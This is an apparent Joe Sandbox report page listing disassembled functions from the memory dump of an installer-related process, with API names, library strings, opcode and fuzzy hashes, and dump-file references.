                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$AllocConcurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4101084277-0
                                                                                                                                                                                                                                                    • Opcode ID: 267a0540851bd796247e095fd526036fe94a45c2c535a2dc5d353bb714b7e019
                                                                                                                                                                                                                                                    • Instruction ID: ffc89652bd3bf5932ea78c2fad7f520b582269156e0e795be5f2a0024fe023ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 267a0540851bd796247e095fd526036fe94a45c2c535a2dc5d353bb714b7e019
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1951C062B58A8586EB14AF56E844BBDA2B0BB54BE4F904A35DF6C077D1DF3CD0908310
                                                                                                                                                                                                                                                    Function 00007FF749F446C0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$AllocConcurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4101084277-0
                                                                                                                                                                                                                                                    • Opcode ID: 3d50bd0cecad5427543ccaa9745356229240f2edca31bc343e374fa73694d5fc
                                                                                                                                                                                                                                                    • Instruction ID: 28f58fdf0d528d70d54709de0d865d89c81d7998473ad93572c1699c702fb8dd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d50bd0cecad5427543ccaa9745356229240f2edca31bc343e374fa73694d5fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0541F262B49A8582EB14FF56E404A79A6A1FB14BE8F904A35DF7C17BD4DF3CE0618310
                                                                                                                                                                                                                                                    Function 00007FF749F4A9F0 Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2826327444-0
                                                                                                                                                                                                                                                    • Opcode ID: 738b738466b5265432daf8a86e748a35c726645d087d339b92698e94175488fe
                                                                                                                                                                                                                                                    • Instruction ID: e6d4236876d9c8006d9e6a08b3c515f230a1268e8483bc0d917dc2cb6b5ce994
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 738b738466b5265432daf8a86e748a35c726645d087d339b92698e94175488fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D441DF62B4CB82C5EB14BF15A1447A9E372EB24BD4F984635DA6D0BBD5DE7CD041C320
                                                                                                                                                                                                                                                    Function 00007FF749F4F9C0 Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc$Concurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1259271893-0
                                                                                                                                                                                                                                                    • Opcode ID: ab0cc08f99234d715a179517fc8b4ba6950f5af868b2200aedc5622ef0d96408
                                                                                                                                                                                                                                                    • Instruction ID: d105a78f1109803901ca0257ec56d81af79919318711087dceb38a551359c35b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab0cc08f99234d715a179517fc8b4ba6950f5af868b2200aedc5622ef0d96408
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE41E161B8CB82C5EB14BF12A504B69E762FB15BE4F984630DE5D0B7D5DE7CE0418320
                                                                                                                                                                                                                                                    Function 00007FF749F47A60 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                    • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                                                                                                    • API String ID: 1452528299-1782174991
                                                                                                                                                                                                                                                    • Opcode ID: a3706dd6c48fb8d0848276de09c76d780a6e5533f151456acfeeec08a92eea57
                                                                                                                                                                                                                                                    • Instruction ID: 1d37793c68bb7b384034a32370e20f2264c087ca29ce3eacc9a07b1e179ce207
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3706dd6c48fb8d0848276de09c76d780a6e5533f151456acfeeec08a92eea57
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60311B56A58A51C1EB116F25E4107BAB3F0FF94F98FD89035DA49433A8EB3CD541C325
                                                                                                                                                                                                                                                    Function 00007FF749F44960 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocConcurrency::cancel_current_taskLocalUninitialize_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 121216245-0
                                                                                                                                                                                                                                                    • Opcode ID: dfeeda7dc5b4eacddbf20e6326d089c794a673fe21d1428d649532e4c07d3379
                                                                                                                                                                                                                                                    • Instruction ID: 36949ac7406662a38374dabb65b874ede658f290e61326abb85aee8a0cbe80ed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfeeda7dc5b4eacddbf20e6326d089c794a673fe21d1428d649532e4c07d3379
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31DE21B0D782C2FB24BF11A54476DA2F1EB24BA4FA40634DAAD17BC5DF3CE0918324
                                                                                                                                                                                                                                                    Function 00007FF749F7B850 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 6b1df792a578f16dc51dec8d855888550671b19fd05fd9b9568840239f08910e
                                                                                                                                                                                                                                                    • Instruction ID: 7f7c8743a3b85a497557a4c612cc748483e8965414d74975fd349e229c4e571c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b1df792a578f16dc51dec8d855888550671b19fd05fd9b9568840239f08910e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B91BF73A18B85CAE710EF65E8802ADBBB0F745788F504129EE8C17B95DF38D195CB10
                                                                                                                                                                                                                                                    Function 00007FF749F79F24 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 5c8bf5583c79376617325a14c9887d91f44b4c143073b17ef00fbcd11834dc60
                                                                                                                                                                                                                                                    • Instruction ID: 98cb5afce8347bec7e7b168ac6648da7effbfc72d671f7230afeaf6892e6b61b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c8bf5583c79376617325a14c9887d91f44b4c143073b17ef00fbcd11834dc60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51A036A1D602CAEB14BF15E444A79B3A1EB44B88F928571EA5E437C8DF7DE841C710
                                                                                                                                                                                                                                                    Function 00007FF749F56844 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 2115809835-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 5fe8542f379b332b509065c449abdd4343ae592ed269cc8bd30ca243a69752e2
                                                                                                                                                                                                                                                    • Instruction ID: 108e6a789fe8871c61797a31a6c01c45f35da8c5f372c7b83df00f8f77883acb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fe8542f379b332b509065c449abdd4343ae592ed269cc8bd30ca243a69752e2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50517B22A0DB42D1EB58BF15D450278A7B1EF84BE4F8A4031DA6E47BDADF3CE9518350
                                                                                                                                                                                                                                                    Function 00007FF749F7BDD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: 0abfadf79ff58853b4606986ad5e381df4c0ec61c91b30c107ed3d920a3e07a9
                                                                                                                                                                                                                                                    • Instruction ID: 3f3b7b9db1e1b7801d33e5d064ca0b0e72c213a835e364df26c7739ec1cffd74
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0abfadf79ff58853b4606986ad5e381df4c0ec61c91b30c107ed3d920a3e07a9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6151903292C682CAEB64BF5194446B8B7B0FB56B85F9441B5EA8D47BC5CF3CE490CB10
                                                                                                                                                                                                                                                    Function 00007FF749F7B5E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: fcac4738994a39817b61394e96e5c600a803cd627c5b4d92602dcbddadf67c8f
                                                                                                                                                                                                                                                    • Instruction ID: dc8f147d2c8a883e38d360cb814a2a7718ebf0e92ec2b48a01a9287d991eebc2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcac4738994a39817b61394e96e5c600a803cd627c5b4d92602dcbddadf67c8f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7961AD3291CBC5C5EB60AF15E4403AAB7A0FB85B88F444265EB9C07B95DF7CD191CB10
                                                                                                                                                                                                                                                    Function 00007FF749F458D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystemwmemcpy_s
                                                                                                                                                                                                                                                    • String ID: ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 2090340569-2227199552
                                                                                                                                                                                                                                                    • Opcode ID: 4f017e4b34d0987f96797e81f45e1a0d591897458d6af0aebac51ff099210c4d
                                                                                                                                                                                                                                                    • Instruction ID: 177050c7d7f8d5536e263e8c06d5941bfafc013cb6d3ee5e325e2b68daefbeb6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f017e4b34d0987f96797e81f45e1a0d591897458d6af0aebac51ff099210c4d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7414922B1CB46C2EB10BF15E8405A9A3B0FB98B94F945232DA9D43BE5DF3CE545C750
                                                                                                                                                                                                                                                    Function 00007FF749F65EE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Maklocwcsstd::_$Getvals
                                                                                                                                                                                                                                                    • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                                                                                                    • API String ID: 1848906033-3573081731
                                                                                                                                                                                                                                                    • Opcode ID: b9039ff8cdb21243be9e35249a0579b0bfae3ce7d598090ca24a24e980762b3a
                                                                                                                                                                                                                                                    • Instruction ID: 1a0cc708d0fb71d860d8e51f88b32c5274498b2ff0554d49af3a61fc3c4abcfa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9039ff8cdb21243be9e35249a0579b0bfae3ce7d598090ca24a24e980762b3a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141AF72A1CB818BE720EF25908036EBBB0FB55B81F554235D78A53A95DF2DF952C700
                                                                                                                                                                                                                                                    Function 00007FF749F9AD94 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                                    • Opcode ID: d331474d9041d8dc70f6197933d7d00de3c0342d5c2ce0b675f97eb690a77ddb
                                                                                                                                                                                                                                                    • Instruction ID: cbffcdb0be0b4a9fb5bdd42ac3c364a7b0cad338125b796cdbf1144a424265e7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d331474d9041d8dc70f6197933d7d00de3c0342d5c2ce0b675f97eb690a77ddb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88D1DF22B18A81C9E711EFAAD4402ACB7B1FB46B9DF844136DE5D97BD9CE38D446C310
                                                                                                                                                                                                                                                    Function 00007FF749F5FDC4 Relevance: 6.3, APIs: 4, Instructions: 283COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
